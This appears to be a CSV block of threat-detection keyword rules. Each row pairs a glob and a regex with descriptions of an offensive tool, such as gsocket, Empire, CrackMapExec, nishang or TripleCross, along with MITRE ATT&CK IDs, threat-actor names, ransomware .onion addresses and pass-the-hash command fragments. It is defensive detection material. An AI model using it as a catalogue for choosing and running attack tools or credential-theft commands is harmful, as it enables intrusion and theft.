"*gsocket_macOS.tar.gz*",".{0,1000}gsocket_macOS\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46778"
"*gsocket_macOS.tar.gz*",".{0,1000}gsocket_macOS\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46779"
"*gsocket_openbsd-x86_x64.tar.gz*",".{0,1000}gsocket_openbsd\-x86_x64\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46780"
"*GSOCKET_SECRET*",".{0,1000}GSOCKET_SECRET.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46781"
"*GSOCKET_SOCKS_IP*",".{0,1000}GSOCKET_SOCKS_IP.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46782"
"*GSOCKET_SOCKS_IP*",".{0,1000}GSOCKET_SOCKS_IP.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46783"
"*GSOCKET_SOCKS_IP=*",".{0,1000}GSOCKET_SOCKS_IP\=.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46784"
"*GSOCKET_SOCKS_PORT*",".{0,1000}GSOCKET_SOCKS_PORT.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46785"
"*gsocket-1.*.tar.gz*",".{0,1000}gsocket\-1\..{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46786"
"*gsocket-relay/monitor/*",".{0,1000}gsocket\-relay\/monitor\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46787"
"*gsocket-tor/*",".{0,1000}gsocket\-tor\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46788"
"*gsocket-tor\*",".{0,1000}gsocket\-tor\\.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46789"
"*gs-root-shell-key.txt*",".{0,1000}gs\-root\-shell\-key\.txt.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46790"
"*gs-sftp -l*",".{0,1000}gs\-sftp\s\-l.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46791"
"*gs-sftp -s thctestserver*",".{0,1000}gs\-sftp\s\-s\sthctestserver.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46792"
"*GTFOBLookup*",".{0,1000}GTFOBLookup.{0,1000}","offensive_tool_keyword","GTFOBLookup","Offline command line lookup utility for GTFOBins and LOLBAS.","T1059 - T1110 - T1216 - T1220","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/nccgroup/GTFOBLookup","1","1","N/A","N/A","N/A","3","277","39","2023-06-16T22:01:43Z","2019-09-23T16:00:18Z","46794"
"*gtfonow.py -a*",".{0,1000}gtfonow\.py\s\-a.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","46795"
"*gtunnel_%s.log*",".{0,1000}gtunnel_\%s\.log.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","46796"
"*gtworek/Priv2Admin*",".{0,1000}gtworek\/Priv2Admin.{0,1000}","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","N/A","10","2124","286","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z","46797"
"*guardicore*monkey*",".{0,1000}guardicore.{0,1000}monkey.{0,1000}","offensive_tool_keyword","Github Username","Welcome to the Infection Monkey! The Infection Monkey is an open source security tool for testing a data centers resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server","T1566 - T1569 - T1570 - T1571 - T1572 - T1573","TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/h0nus","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","46798"
"*guardicore/monkey*",".{0,1000}guardicore\/monkey.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","46799"
"*guerillamailaccount@sharklasers.com*",".{0,1000}guerillamailaccount\@sharklasers\.com.{0,1000}","offensive_tool_keyword","Dispossessor","email used by the Dispossessor ransomware group notes for data exfiltration","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Data Exfiltration","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#email","N/A","10","10","N/A","N/A","N/A","N/A","46800"
"*Guest User Policy: Guest users have the same access as members (most inclusive)*",".{0,1000}Guest\sUser\sPolicy\:\sGuest\susers\shave\sthe\ssame\saccess\sas\smembers\s\(most\sinclusive\).{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46801"
"*guida.exe -*",".{0,1000}guida\.exe\s\-.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/foxlox/GIUDA","1","0","N/A","N/A","9","5","469","68","2025-03-30T20:42:43Z","2023-07-19T15:37:07Z","46802"
"*gunicorn ares:app*",".{0,1000}gunicorn\sares\:app.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","46803"
"*gunyhng6pabzcurl7ipx2pbmjxpvqnu6mxf2h3vdeenam34inj4ndryd.onion*",".{0,1000}gunyhng6pabzcurl7ipx2pbmjxpvqnu6mxf2h3vdeenam34inj4ndryd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","46804"
"*Gupt-Backdoor.ps1*",".{0,1000}Gupt\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46805"
"*Gupt-Backdoor.ps1*",".{0,1000}Gupt\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46806"
"*gustanini/PowershellTools*",".{0,1000}gustanini\/PowershellTools.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","46807"
"*gvka2m4qt5fod2fltkjmdk4gxh5oxemhpgmnmtjptms6fkgfzdd62tad.onion*",".{0,1000}gvka2m4qt5fod2fltkjmdk4gxh5oxemhpgmnmtjptms6fkgfzdd62tad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","46808"
"*Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg==*",".{0,1000}Gw3kg8e3ej4ai9wffn\%2Fd0uRqKzyaPfM2UFq\%2F8dWmoW4wnyKZhx07Bg\=\=.{0,1000}","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/glebarez/padre","1","0","#base64","N/A","8","3","253","24","2024-05-13T14:28:25Z","2019-12-30T13:52:03Z","46809"
"*gwisin4yznpdtzq424i3la6oqy5evublod4zbhddzuxcnr34kgfokwad.onion*",".{0,1000}gwisin4yznpdtzq424i3la6oqy5evublod4zbhddzuxcnr34kgfokwad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","46810"
"*gwvueqclwkz3h7u75cks2wmrwymg3qemfyoyqs7vexkx7lhlteagmsyd.onion*",".{0,1000}gwvueqclwkz3h7u75cks2wmrwymg3qemfyoyqs7vexkx7lhlteagmsyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","46811"
"*-H lm-hash:nt-hash*",".{0,1000}\-H\slm\-hash\:nt\-hash.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","46812"
"*-H 'LMHASH:NTHASH'*",".{0,1000}\-H\s\'LMHASH\:NTHASH\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","46813"
"*-H 'NTHASH'*",".{0,1000}\-H\s\'NTHASH\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","46814"
"*h2csmuggler --scan-list *",".{0,1000}h2csmuggler\s\-\-scan\-list\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46815"
"*h2csmuggler -x * --test*",".{0,1000}h2csmuggler\s\-x\s.{0,1000}\s\-\-test.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46816"
"*h3GywpDrP6gJEdZ6xbJbZZVFmvFZDCa4KcRd*",".{0,1000}h3GywpDrP6gJEdZ6xbJbZZVFmvFZDCa4KcRd.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","46817"
"*h3xduck/TripleCross*",".{0,1000}h3xduck\/TripleCross.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","1","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","46818"
"*h4ntu shell [powered by tsoi]*",".{0,1000}h4ntu\sshell\s\[powered\sby\stsoi\].{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","46819"
"*H4sIAAAAAAAEACVQ30vDMBB*",".{0,1000}H4sIAAAAAAAEACVQ30vDMBB.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","46820"
"*H4sIAAAAAAAEAIy5BVyTbdQ4PDbYYJSju2N0h5TSndJINyKD0RKKdIOgNIiSChIiYUurgIQoiICAlAJSiojgd9*",".{0,1000}H4sIAAAAAAAEAIy5BVyTbdQ4PDbYYJSju2N0h5TSndJINyKD0RKKdIOgNIiSChIiYUurgIQoiICAlAJSiojgd9.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","#base64","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46821"
"*H4sIAAAAAAAEANy9CZwcRfU43tPd093Tc*",".{0,1000}H4sIAAAAAAAEANy9CZwcRfU43tPd093Tc.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","46822"
"*H4sIAAAAAAAEANy9e3wTVfo4PG1SmkLbCdpgFdSgUeuCbLTAthYk005gQhNahUIVkCqIqKi1TaAuIGBaJRzG27Kuul5wV3fV1fUuUFxNKbTl3oJAuaiouE4paAGBFpB5n*",".{0,1000}H4sIAAAAAAAEANy9e3wTVfo4PG1SmkLbCdpgFdSgUeuCbLTAthYk005gQhNahUIVkCqIqKi1TaAuIGBaJRzG27Kuul5wV3fV1fUuUFxNKbTl3oJAuaiouE4paAGBFpB5n.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#base64","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","46823"
"*H4sIAAAAAAAEAO06C3Bb1ZVXjp4t23HkOJZx4ji8BDk2UDuOFcD5mEixBM9UpiJxUgYSZEV*",".{0,1000}H4sIAAAAAAAEAO06C3Bb1ZVXjp4t23HkOJZx4ji8BDk2UDuOFcD5mEixBM9UpiJxUgYSZEV.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#base64","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","46824"
"*H4sIAAAAAAAEAO1YfXRTR3YfWZItGxkrxE4cwodI5Bg2sS35yZ*",".{0,1000}H4sIAAAAAAAEAO1YfXRTR3YfWZItGxkrxE4cwodI5Bg2sS35yZ.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#base64","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","46825"
"*H4sIAAAAAAAEAOx9CVhTR9fw3CQkYScgqyAILsgm*",".{0,1000}H4sIAAAAAAAEAOx9CVhTR9fw3CQkYScgqyAILsgm.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","46826"
"*h8mail -*",".{0,1000}h8mail\s\-.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Reconnaissance","https://github.com/opencubicles/h8mail","1","0","N/A","N/A","N/A","1","11","4","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z","46827"
"*h8mail -t *@*.*",".{0,1000}h8mail\s\-t\s.{0,1000}\@.{0,1000}\..{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46828"
"*h8mail*",".{0,1000}h8mail.{0,1000}","offensive_tool_keyword","h8mail","h8mail is an email OSINT and breach hunting tool using different breach and reconnaissance services. or local breaches such as Troy Hunts Collection1 and the infamous Breach Compilation torrent","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Reconnaissance","https://github.com/khast3x/h8mail","1","0","N/A","N/A","N/A","10","4408","539","2023-08-15T10:50:34Z","2018-06-15T02:47:00Z","46829"
"*Ha3MrX/Gemail-Hack*",".{0,1000}Ha3MrX\/Gemail\-Hack.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","N/A","7","10","1062","400","2024-01-17T15:12:44Z","2018-04-19T13:48:41Z","46830"
